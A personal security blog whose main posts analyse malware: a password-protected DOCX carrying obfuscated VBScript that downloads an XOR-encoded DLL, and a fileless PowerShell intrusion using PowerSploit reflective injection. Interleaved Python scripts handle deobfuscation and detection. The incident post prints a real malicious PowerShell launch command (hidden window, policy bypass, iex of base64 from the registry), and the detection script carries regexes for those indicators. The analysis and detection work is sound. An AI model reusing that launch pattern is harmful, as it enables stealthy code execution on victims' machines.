Monday, April 24, 2017

More Malicious Docs, Oh My!

Introduction

Ok, I know malicious documents, specifically .DOC, so how is this one different?  Well, we will get to that in a bit.  I wrote this posting as more of an introduction to Visual Basic script deobfuscation and hope others might find it useful/interesting.

Initial Detections

It all started with many users reporting suspicious emails.  These emails were a little different from the usual "Open this email and enable macros to view the content".  

First, these emails contained a .DOCX rather than the older .DOC or a .DOCM.  Ok, that is odd. 

Secondly, they were encrypted.  The email they were attached to gave instructions on how to open the attachment with the password.



Initial Analysis

So the first thing to do is see what VirusTotal and Hybrid-Analysis have on this encrypted document.  Let's see....

Not starting so good....

Maybe Hybrid has more....

Ok.  So nothing much from any of the usual online sources....  To double-check, let's try some of our command line tools.


So, it is a valid OLE document, however it has no macros to speak of.  One issue I noticed is that OLEID states that the file is not encrypted and not a Word document.  I will follow up on this in the near future.

Decrypting DOCX

So let's see about getting something useful outta this...  It was quite easy to do.  I could have used MS Word, however to be a bit safer, let's use LibreOffice....

First, we are presented with this:


Ok, once the (correct) password is entered, we finally see the true document....


Interesting.  Seems the document has 3 embedded objects.  We will work on those in a bit.  First, let's see what our tools say about the document NOW!



Ok, now that looks A LOT more malicious.  So far so good I would say.  What more can we tell though?  Those embedded OLE objects look very suspicious.  Let's check them out...


OLEVBA states there is no macro.  Ok, so not using macros...  Let's see what the other tools we have will tell us....


Ok, OLEDUMP tells us a bit more.  Three objects embedded.  And they all seem to have the same sizes.  Let's extract them and run a cryptographic hash to see if they are indeed the same....


So they ARE all the same.  Cool.  Let's look at what we got.

So it looks like standard Visual Basic Script, although obfuscated.  Ok, so now here is where the fun begins....

Visual Basic Deobfuscation

The first thing I decided to do was load the script up in Notepad++ and turn on syntax highlighting.

I find syntax highlighting helps a lot.  So the first thing I like to do is start cleaning up the silly cAmElCaSe I see in the document (a simple find/replace works nicely), and put some extra whitespace between all of the functions and subroutines...


Ok, that is a bit better.  The first thing I notice is the use of mathematical functions.  Most likely they are used to represent simple numbers.  Let's go and take care of all of those....


The KyVrqqM function being called here looks A LOT like some sort of decryption routine.  Will look at this in a bit.

Another thing I noticed while doing the original deobfuscation, is that there appears to be a bunch of junk instructions.


This pattern repeats (with different variables and data) over and over and over again.  When examining the variables, they are only used within these three lines, which means they are essentially a "Do Nothing" collection of instructions.  Let's delete them and see what that does to the size of our script...

WOW, doing just that, the file has gone from 464 lines to just 170.  This also revealed some other 'complication' techniques, like using a function to call a single function.  We can simplify that further...


Let's see where OgkD is called and replace each call with Mid itself (there are a few different wrapper functions like this, including ones for Asc and Chr).  Let's do them all and see what happens...

Down to 158 lines.  Smaller gains, but still, let's continue!  Next I look for variables that are set but never used (a simple find or count should indicate that it is safe to delete them).  Then I look for variables that are set to a static piece of data and then used elsewhere (non-mutable).  Those can be substituted with no effect.


Down to 101 lines.  That is a lot of junk.  Probably more there that could be removed, but so far it looks like a job well done.  The code is much more readable and it is becoming clearer that this script is meant to download something, write it to a file and do something with it.
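The two passes just described (delete variables that are set but never read, then substitute variables that hold a static string) done mechanically, as an added example of mine rather than anything from the post or the sample.  The VBScript fragment is constructed; the dead-store pass loops until nothing else falls out, since deleting one junk line can orphan the variable another junk line fed.

```python
import re

# Constructed VBScript in the style the post describes: a junk variable that is
# only ever written, and a constant string set once and used elsewhere.
SAMPLE_VBS = """\
Dim aaa
aaa = "junk"
aaa = aaa & "more junk"
url = "http://example.invalid/stage.bin"
Set req = CreateObject("MSXML2.XMLHTTP")
req.Open "GET", url, False
req.Send
"""
IDENT = r"[A-Za-z_]\w*"
DIM_RE = re.compile(r"^\s*Dim\s+(" + IDENT + r")\s*$", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?(" + IDENT + r")\s*=\s*(.+?)\s*$", re.I)
STR_LIT = re.compile(r'^"[^"]*"$')

def _used(name, lines):
    return any(re.search(r"\b" + re.escape(name) + r"\b", l, re.I) for l in lines)

def remove_dead_stores(lines):
    """Drop Dim/assignment lines of variables never read anywhere else.
    Loops to a fixpoint: deleting one store can orphan another variable."""
    lines = list(lines)
    while True:
        stores = {}                      # name -> indexes of its Dim/assign lines
        for i, line in enumerate(lines):
            m = DIM_RE.match(line) or ASSIGN_RE.match(line)
            if m:
                stores.setdefault(m.group(1).lower(), []).append(i)
        dead = set()
        for name, idx in stores.items():
            if not _used(name, [l for j, l in enumerate(lines) if j not in idx]):
                dead.update(idx)
        if not dead:
            return lines
        lines = [l for i, l in enumerate(lines) if i not in dead]

def inline_constants(lines):
    """Substitute variables assigned exactly once to a plain string literal and
    drop their Dim/assignment lines (no guard for the name inside other strings)."""
    assigns = {}
    for line in lines:
        m = ASSIGN_RE.match(line)
        if m:
            assigns.setdefault(m.group(1).lower(), []).append(m.group(2))
    consts = {n: v[0] for n, v in assigns.items() if len(v) == 1 and STR_LIT.match(v[0])}
    out = []
    for line in lines:
        m = DIM_RE.match(line) or ASSIGN_RE.match(line)
        if m and m.group(1).lower() in consts:
            continue
        for name, lit in consts.items():
            line = re.sub(r"\b" + re.escape(name) + r"\b", lambda _: lit, line, flags=re.I)
        out.append(line)
    return out

def deobfuscate(vbs):
    return "\n".join(inline_constants(remove_dead_stores(vbs.splitlines())))
```

Member assignments such as `obj.prop = x` and multi-variable `Dim` lines are deliberately left alone, so the passes only ever remove what they can prove is unread.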

One item that keeps coming up, over and over again, is this:


I am pretty sure this is some sort of decryption given the parameters "encodedtext", "key", offset1 and offset2.  Let's copy these to another file along with the function....


Two extra functions had to be added in.  Looks like a mathematical one and a possible XOR routine.  Let's run it and see what it gives...


Now that is interesting.  We have a couple of http strings, along with some commands designed to run DLLs....

Downloaded Payload

Now let's try to download those files and see what they give us...

Hmmm, the first link gives us a binary file.  The 'file' command only lists it as 'data', not very useful.  What about the second file?  Well, that was time wasted.  Unable to find a copy of the file at all.  So let's start on that first one.

The file shows up in VirusTotal, interestingly enough.  Still not a true virus, but enough people know about it to show us something.


Something smells familiar though.  My hunch is it has been XORed.  I see some XOR-like function in the Visual Basic script, but I am feeling a bit lazy.  Back to one of Didier's programs, XORSearch.


Ok, now that was easy.  Let's see if we can find 73 anywhere in our script.  No dice....  Oh but wait, 0x73 converted from hex to decimal gives us 115.  Let's look that up....  BINGO!


Looking at that last line, I noticed that the YS function appears to be the same one that looked like an XOR function.  Guess I was right.  The ASCII representation of Xb808 is XORed with 115 as the decimal key.


So, let's XOR this file and see what pops out on the other end.  For this I will use Didier's tools again (xorsearch -p -s xoredfile.bin).
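What XORSearch's PE mode is doing under the hood, as an added example of mine (not Didier's code and not the post's sample): try every single-byte key and look for what a PE file must contain, then decode with the winner.  The "xored file" is constructed here, using the same key of 115 (0x73) the script gave away.

```python
# Single-byte XOR key recovery followed by the decode.  Added example, my code;
# the xored payload below is constructed, not the post's sample.
KEY = 115                                   # 0x73, the key the post recovered
DOS_STUB = b"This program cannot be run in DOS mode"
PLAIN = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" +
         DOS_STUB + b".\r\n$\x00\x00\x00\x00\x00")
XORED = bytes(b ^ KEY for b in PLAIN)       # stand-in for xoredfile.bin

def xor_bytes(data, key):
    """XOR every byte with a single-byte key (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)

def rank_keys(data, markers=(b"MZ", DOS_STUB)):
    """Score each candidate key by the markers its decode contains, plus a bonus
    when the decode starts with the MZ header.  Returns (score, key), best first.
    A lone 'MZ' somewhere in the middle is weak evidence (it shows up by chance
    under some key); the DOS stub string plus MZ at offset 0 is what you want."""
    ranked = []
    for key in range(256):
        plain = xor_bytes(data, key)
        score = sum(m in plain for m in markers) + (plain[:2] == b"MZ")
        if score:
            ranked.append((score, key))
    return sorted(ranked, reverse=True)

def recover(data):
    """Return (key, decoded bytes) for the best-scoring key, or (None, None)."""
    ranked = rank_keys(data)
    if not ranked:
        return None, None
    key = ranked[0][1]
    return key, xor_bytes(data, key)

if __name__ == "__main__":
    key, out = recover(XORED)
    print("key 0x%02x (%d), decode starts with %r" % (key, key, out[:2]))
```

For a real file, replace XORED with the bytes read from disk; a multi-byte or rolling key will not rank well here, which is itself a useful signal that a plain single-byte XOR is not what you are looking at.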



So this finally gives us our DLL!  So let's look at what VT has to say about it....


So definitely a naughty little program.  I will end it here as my DLL reversing is not yet up to where I want to post publicly about it  :)  Hopefully later...  Hope you enjoyed!

Shout Outs

Here I want to put in a few links and shout outs to places and tools that I have used and that helped me out through my work here.
I was asked on a mailing list of mine to put in some more text.  Well this might not be what he wanted, but I thought I would upload a little ugly sed sled (you will see why) to help with the camel case and break things apart a little....

sed 's/function/Function/Ig' | sed 's/set/Set/Ig' | sed 's/end/End/Ig' | sed 's/if/If/Ig' | sed 's/do/Do/Ig' | sed 's/and/And/Ig' | sed 's/write/Write/Ig' | sed 's/read/Read/Ig' | sed 's/responsebody/ResponseBody/Ig' | sed 's/then/Then/Ig' | sed 's/else/Else/Ig' | sed 's/dim/Dim/Ig' | sed 's/sub/Sub/Ig' | sed 's/create/Create/Ig' | sed 's/object/Object/Ig' | sed 's/textfile/TextFile/Ig' | sed 's/environment/Environment/Ig' | sed 's/get/Get/Ig' | sed 's/asc/Asc/Ig' | sed 's/chr/Chr/Ig' | sed 's/mid/Mid/Ig' | sed 's/error/Error/Ig' | sed 's/true/True/Ig' | sed 's/status/Status/Ig' | sed 's/resume/Resume/Ig' | sed 's/send/Send/Ig' | sed 's/open/Open/Ig' | sed 's/next/Next/Ig' | sed 's/for/For/Ig' | sed 's/ to / To /Ig' | sed 's/type/Type/Ig' | sed 's/savetofile/SaveToFile/Ig' | sed 's/close/Close/Ig' | sed 's/loop/Loop/Ig' | sed 's/err.number/Err.Number/Ig' | sed 's/until/Until/Ig' | sed 's/End Function/End Function\n/g' | sed 's/End Sub/End Sub\n/g'
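The same recasing as an added Python example of mine (not the post's command), using word boundaries so the substitutions stop at whole words; the keyword list is my assumption, modelled on the sed above, and the sample script is constructed.

```python
import re

# Keyword spellings to restore; constructed list modelled on the sed sled above.
KEYWORDS = ["Function", "Sub", "End", "Set", "Dim", "If", "Then", "Else", "For",
            "To", "Next", "Do", "Loop", "Until", "And", "True", "On", "Error",
            "Resume", "Err.Number", "CreateObject", "ResponseBody", "SaveToFile",
            "Asc", "Chr", "Mid", "Open", "Send", "Close", "Status", "Type",
            "Write", "Read", "Environment", "Get"]

def recase(vbs):
    """Put known keywords back into canonical case.  The \\b anchors are the
    difference from the plain sed substitutions: 'do' no longer turns window
    into winDow and 'if' no longer turns notify into notIfy."""
    for kw in KEYWORDS:
        vbs = re.sub(r"\b" + re.escape(kw) + r"\b", kw, vbs, flags=re.I)
    # a blank line after each procedure so the blocks stand apart
    return re.sub(r"(?im)^(end (?:function|sub))[ \t]*$", r"\1\n", vbs)

# Constructed sample in the cAmElCaSe style the post describes.
SAMPLE = ("fUnCtIoN decode(s)\n  dIm window\n  SeT window = cReAtEoBjEcT(\"WScript.Shell\")\n"
          "  IF window Is Nothing THEN\n    decode = \"\"\n  eNd If\neND fUNCTION\n"
          "sUB notify()\neNd SuB\n")
```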

Friday, March 17, 2017

I'm Not Worthy

This post started as a realization. 

I realized that perhaps a part of my personality had sabotaged itself.  Ok, let's turn the clock back a bit and describe the scenario.



About a year ago, I was doing well, and felt pretty successful.  However, something was missing.  Or perhaps I felt I was missing out on opportunities to further myself.  It's a common issue in the IT security field.  We want more...  Either more money, more responsibility, more knowledge, or even the ability to help out more people.  I just felt I needed something.

I saw a position opening at a major company that looked like it would have fit the bill perfectly.  It was at a well-known and liked company, doing security (incident response and forensics), and with the benefit of helping tons of people all over the world. It would mean learning some new skills (extra win for me) and would get my name out there (rock star here I come!).  So, why not apply?  Of course I did.  This is where the issues started.

First, this was a major internet services and software company, so I figured there was no way they would want me.  I was sure there would be someone better, even though I know I am good at what I do.  No worries then right?

Not so fast, they called me back.  "WOW", I thought.  Maybe they really would like me.  I did a telephone interview and had a blast.  I have always been good at talking with people, especially when it comes to areas I love so much.  But this was JUST a telephone interview...  I have had tons of those before.  No worries again right?

Then suddenly, I receive a telephone call stating they were interested in bringing me in for an in-person interview.  WTF?!?!  I mean they wanted to FLY me down to California to meet up with them.  Ok, this was indeed getting serious.  But I thought, I am cool, I can do this.

By the time my flight arrived, I had already convinced my wife that this would be a good thing.  I would continue to keep working from home, but for this awesome company.  Can I do it?  Yes I can!

The interview came, and that is when the real trouble started.  No, I did not blow it.  Quite the opposite, I did very well.  Apparently I not only had the skills and drive, but could talk with both the technical and business side of the company.  They seemed to genuinely appreciate me and loved what I had to say.  And the team I applied with, did I mention they were SMART?  Even more so.  It blew me away.

I came away fully thinking I might get the job.  Everything was good...  Or so I thought...

I started getting second thoughts.  I mean, am I truly worthy?


I started feeling that these guys were out of my league.  I started to worry that I would not be able to contribute to a decent standard.  After all, I am not in it just for the pay cheque, I am there to both learn, and to make the world a bit better.  If I am always playing catch-up, I wouldn't feel useful and that would probably end my entire career one way or another.

It became so bad, that when I was offered the job, I spent a whole weekend going back and forth.  Eventually I turned it down.  I am sure I surprised them, I know I surprised myself, and even surprised my wife (who doesn't care for me changing jobs too often).  It was one of the harder decisions of my professional career.



Ok, now fast forward a bit (well, all the way back to present).  I started to reflect again on this event and started to realize a few things.  I had sabotaged myself.  Obviously I was qualified for the job, and they had truly wanted me on their team.  I remembered reading something by Dr. Barker from the UK about imposter syndrome.  http://cyber.uk/imposter/   I have turned out to be a victim of my own self-doubt and feelings of being an imposter. 

Now nothing can change the past, I know that, and accept it.  But reflecting and learning about this event, I feel, has helped me realize some of my limitations, and facets of self that I need to change.  I know, nothing particularly ground-breaking, however as this event kept popping up in my mind, I felt a need to understand it further.  Posting this blog is part of that process.  Healing and self-understanding are very important, especially in a field as dynamic and driven as IT security.

Let me know what you think in the comments.  I am sure many of us have had such times or moments when we wavered.

Derek

Friday, June 17, 2016

Geek Birthday

Ok, I will say it is my birthday today.  But it is the geekiest birthday of them all!  I am officially the answer to life, the universe, and everything!  Be excellent to each other!

D

Thursday, June 9, 2016

Powershell Empire Part 1

Let me start this post with the standard disclaimer.  All opinions found inside, are mine alone.  My employer has not paid/agreed/authorized/been informed of any of this.  With that said, onto the fun!

Introduction

This particular incident was discovered a few weeks ago at my employer while we were doing some hunting.  Below is a rundown of what was done and how the sample was analyzed.  The most interesting part of this one was the use of fileless malware (well, almost fileless) to evade detection.

Initial Detections

Our team was looking at some new information being logged by our SCCM team.  One of the new pieces being added was a historical listing of running processes.  A quick peek into this data with one of our Red Team members showed some interesting results (Purple Teaming).  Namely PowerShell running, including some rather LONG command line options.

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\TNjWerQKhf').YRRPM)));

In addition, the machine in question was seen contacting domains which had been reported to belong to Powershell Empire.  This is getting interesting!


Powershell Registry Decoded

The script shown above reads a registry value under the current user profile, decodes it from base64 and hands the result to iex.

Decoded it looks A LOT more interesting....


This script appears to contain ANOTHER embedded script.  Geez guys can't you do it all in one script?!?!  Oh well, what do we have here....

Trying to decode the base64 did not reveal anything readable...  Seems the script is obfuscated somehow.  Looking at the previous script, we can see where this happens....


Ok, so maybe let's run this in the PowerShell ISE and debug it.  Putting a breakpoint after the inflatebin (ungzip) reveals the decoded script....
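The command line and the two-stage decode described from the first process listing down to the inflatebin breakpoint, written up as a defender's triage script.  Added example, my code, not anything from the incident: the log entry is constructed in the shape the post shows, the registry key and value name are placeholders, and the two-stage payload is constructed so the gunzip step has something to chew on.

```python
import base64, gzip, re

# Constructed process-creation entry in the shape the post shows; the registry
# key and value name are placeholders, not the ones from the real incident.
CMDLINE = (r"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile "
           r"-windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII"
           r".GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\PLACEHOLDERKEY').PLACEHOLDERVALUE)));")

INDICATORS = {     # any one alone is noise; all five together is the post's pattern
    "hidden_window":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass":     re.compile(r"-e(?:xecutionpolicy)?\s+bypass", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64_decode":     re.compile(r"FromBase64String", re.I),
    "registry_read":     re.compile(r"\bgp\b|Get-ItemProperty", re.I),
}
REG_REF = re.compile(r"\(gp\s+'([^']+)'\)\.(\w+)", re.I)

def triage_cmdline(cmd):
    """Report which indicators fire and where the stage lives, so the responder
    knows which registry value to export from the host."""
    m = REG_REF.search(cmd)
    return {"indicators": [n for n, rx in INDICATORS.items() if rx.search(cmd)],
            "registry_key": m.group(1) if m else None,
            "value_name": m.group(2) if m else None}

def decode_stage(b64):
    """Base64-decode a stored stage; gunzip it when the bytes carry the gzip
    magic, which is what the post's inflatebin step did for the second stage."""
    raw = base64.b64decode(b64)
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    return raw.decode("ascii", errors="replace")

def embedded_b64(script, min_len=40):
    """Pull long quoted base64 literals out of a decoded script: the next stage."""
    return re.findall(r"'([A-Za-z0-9+/=]{%d,})'" % min_len, script)

# Constructed two-stage sample: outer script carrying a gzipped, base64 inner script.
INNER = "Write-Output 'constructed inner stage'"
OUTER = "$s = '%s'\n# ...inflate and run $s..." % base64.b64encode(
    gzip.compress(INNER.encode())).decode()
REG_VALUE = base64.b64encode(OUTER.encode()).decode()
```

Running triage_cmdline over the command-line column of the process history is the cheap hunt; decode_stage then peels the stages off a registry export without ever executing them.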


This looks very familiar.  A quick google search pulled up PowerSploit.  So this guy was trying to use PowerSploit eh?  But there is more to the first script...  Lets start looking down the lines....

Then there is an if-then-else statement.  A quick check of the documentation shows that it is checking the pointer size.  Ah, a check for 32- or 64-bit.



The script then loads in the appropriate base64 encoded DLL and runs it through the same deobfuscator.



Lastly, this one confused me for a bit.  It is obviously attempting to do a reflective injection.  But when looking at the system, the network connections were just coming out of powershell.exe.  Why do this?  Again, time to read the manual.  Seems the default behaviour of PowerSploit is to inject into itself.  This is to prevent writing to disk.  Ah, ok.  Still not that stealthy, but oh well.  Never give too much credit, these people ARE writing malware after all...  Last step is to set the code executing and we are off to the races.



Part 1 Ending

So far this has been exciting!  Malware which uses PowerShell to launch, and attempts to remain undetected by not writing anything (well, ALMOST nothing) to disk.  In the next section I will attempt to describe and deconstruct the actual malware (DLL).  If you have any comments (constructive feedback only), please let me know.  Fairly quick and dirty, but I wanted to get my thoughts written out.

Derek
@dsplice


Edit:
When investigating this incident, several connections were noticed to PowerShell Empire's website.  So we named it internally as such.  It is not an indicator that PowerShell Empire, or the developers were involved in any way.  Just sounded like a cool name at the time!  :)

Monday, June 6, 2016

Introductions And A Start

Welcome to my little corner of the internet.  Not much here right now, but I wanted a place to post thoughts and investigations I found interesting.  Please be gentle, I'm a newbie...  :)

Edit:
I would like to add my resume on here for anyone who would be interested in hiring this geek  :)

Resume of Derek Armstrong